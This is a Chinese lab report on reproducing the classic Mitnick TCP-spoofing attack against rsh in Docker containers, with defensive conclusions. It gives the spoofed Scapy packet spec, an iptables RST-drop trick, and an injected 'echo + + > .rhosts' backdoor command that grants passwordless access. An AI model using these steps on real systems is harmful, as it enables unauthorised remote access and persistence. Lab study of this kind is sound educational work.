+- *攻击机（Attacker）*：运行在 `host` 网络模式。这一配置至关重要，因为它允许攻击容器直接操作物理网卡，从而能够嗅探网桥上的所有流量（由于实验在单台宿主机上进行，这模拟了同一局域网下的环境）。
+
+#figure(
+  image("dockerps.png", width: 95%),
+  caption: [基于 Docker Compose 部署的实验节点拓扑],
+)
+
+= 实验步骤及结果
+
+== 任务 1：模拟环境初始化与信任验证
+
+=== 1.1 建立信任根基
+首先在目标机 `x-terminal` 上配置 `.rhosts` 文件。该文件是 rsh 身份验证的核心，它告诉系统：只要请求来自 `10.9.0.6` 的 `seed` 用户，即可无需密码执行命令。
+
+```bash
+# 在 x-terminal 上执行，模拟合法的系统配置
+docker exec x-terminal-10.9.0.5 bash -c "echo 10.9.0.6 > /home/seed/.rhosts"
+```
+
+=== 1.2 连通性测试
+在实施攻击前，需确保合法的信任路径通畅。执行以下验证命令：
+```bash
+docker exec trusted-server-10.9.0.6 bash -c "su seed -c 'rsh 10.9.0.5 date'"
+```
+#figure(
+  image("task1_trusted_verify.png", width: 85%),
+  caption: [初始信任验证：信任服务器成功获取目标机日期],
+)
+
+=== 1.3 关键：静态 ARP 缓存注入
+在真实攻击中，由于信任机已被静默，目标机在发送回包前会广播 ARP 请求查询其 MAC。如果无人响应，连接将由于物理层解析失败而中断。本实验通过设置静态 ARP 缓存来模拟攻击者在局域网内通过 ARP 欺骗（或利用目标机已有缓存）的情景：
+```bash
+docker exec x-terminal-10.9.0.5 arp -s 10.9.0.6 7a:2f:97:ea:52:7c
+```
+#figure(
+  image("task1_arp_static.png", width: 85%),
+  caption: [在目标机注入静态 ARP 记录，确保其数据包能正确发出],
+)
+
+== 任务 2：Mitnick 核心攻击实现
+
+=== 2.1 多线程 Scapy 攻击逻辑
+攻击脚本 `mitnick_final.py` 采用了多线程架构。主线程负责发送伪造的 SYN 包，嗅探线程则实时监控网桥上的回包。
+
+核心交互逻辑分析：
+- *Step 1*: 攻击者发送 `IP(src="10.9.0.6", dst="10.9.0.5")/TCP(sport=1023, dport=514, flags="S")`。
+- *Step 2*: 目标机返回 SYN+ACK。攻击者通过嗅探获取其 `seq`。
+- *Step 3*: 攻击者回复 ACK 完成主连接握手，随后立即发送包含 payload 的 PSH+ACK 包。
+- *Step 4*: 目标机解析 payload 发现客户端要求反向连接 `1022` 端口，于是发起 SYN。攻击者回复相应的 SYN+ACK 完成第二次连接。
+
+=== 2.2 运行攻击与日志分析
+```bash
+docker exec seed-attacker python3 /volumes/mitnick_final.py
+```
+#figure(
+  image("task2_attack_execution.png", width: 90%),
+  caption: [攻击脚本执行日志：清晰可见两次握手与数据注入过程],
+)
+
+*技术细节分析*：在运行脚本时，我们利用 `iptables` 规则阻断了宿主机内核自动发送的 RST 包。这是因为攻击者伪造了源 IP，宿主机内核收到针对该 IP 的回包时会认为是非法连接而尝试中断。通过 `iptables -t raw -A PREROUTING -p tcp --dport 1023 -j DROP` 解决了这一干扰。
+
+== 任务 3：植入后门与权限持久化
+
+=== 3.1 权限跨越：从单次利用到永久后门
+攻击脚本注入的指令是 `echo + + > /home/seed/.rhosts`。这里的 `+ +` 含义极具破坏性：第一个 `+` 代表信任任何主机，第二个 `+` 代表信任任何用户。
+
+```bash
+docker exec x-terminal-10.9.0.5 cat /home/seed/.rhosts
+```
+#figure(
+  image("task3_backdoor_success.png", width: 85%),
+  caption: [攻击结果：.rhosts 文件已被成功篡改，系统防御彻底瓦解],
+)
+
+=== 3.2 最终效果验证
+此时，攻击者已无需再进行任何复杂的序列号预测或 IP 欺骗，直接从本机 IP 即可访问目标：
+```bash
+docker exec seed-attacker timeout 5s rsh -l seed 10.9.0.5 date
+```
+#figure(
+  image("task3_final_access.png", width: 90%),
+  caption: [攻击闭环：攻击者获得持久化的无密码远程执行权限],
+)
+
+= 实验总结
+
+本次 Mitnick 攻击复现实验是一次跨越协议栈多层的综合演练。通过对该经典案例的研究，可以得出以下结论：
+
+1.  *协议安全的脆弱性*：TCP 协议早期的 ISN 生成算法缺乏随机性，是整个攻击链条的阿基里斯之踵。虽然现代操作系统已引入加密强度的随机 ISN，但这种“基于预测的攻击”思路在应用层协议中依然屡见不鲜。
+2.  *信任链条的连锁反应*：IP 地址不应被视为身份认证的唯一凭证。rsh 这种基于 IP 信任的设计在面对 IP 欺骗时毫无抵抗力。
+3.  *环境干扰的解决能力*：实验过程中发现宿主机内核的 RST 响应会破坏欺骗连接，通过 `iptables` 进行策略性拦截是网络攻防实验中的常用技巧。
+4.  *纵深防御的重要性*：单点的安全防护（如仅仅保证 ISN 随机）是不够的，必须结合防火墙、加密协议（SSH 替代 rsh）以及严格的访问控制列表（ACL）才能构建稳固的防御体系。
+
+通过本次实验，我不仅掌握了 Scapy 这一利器的使用，更对网络协议的精妙与风险有了从理论到实践的深刻认识。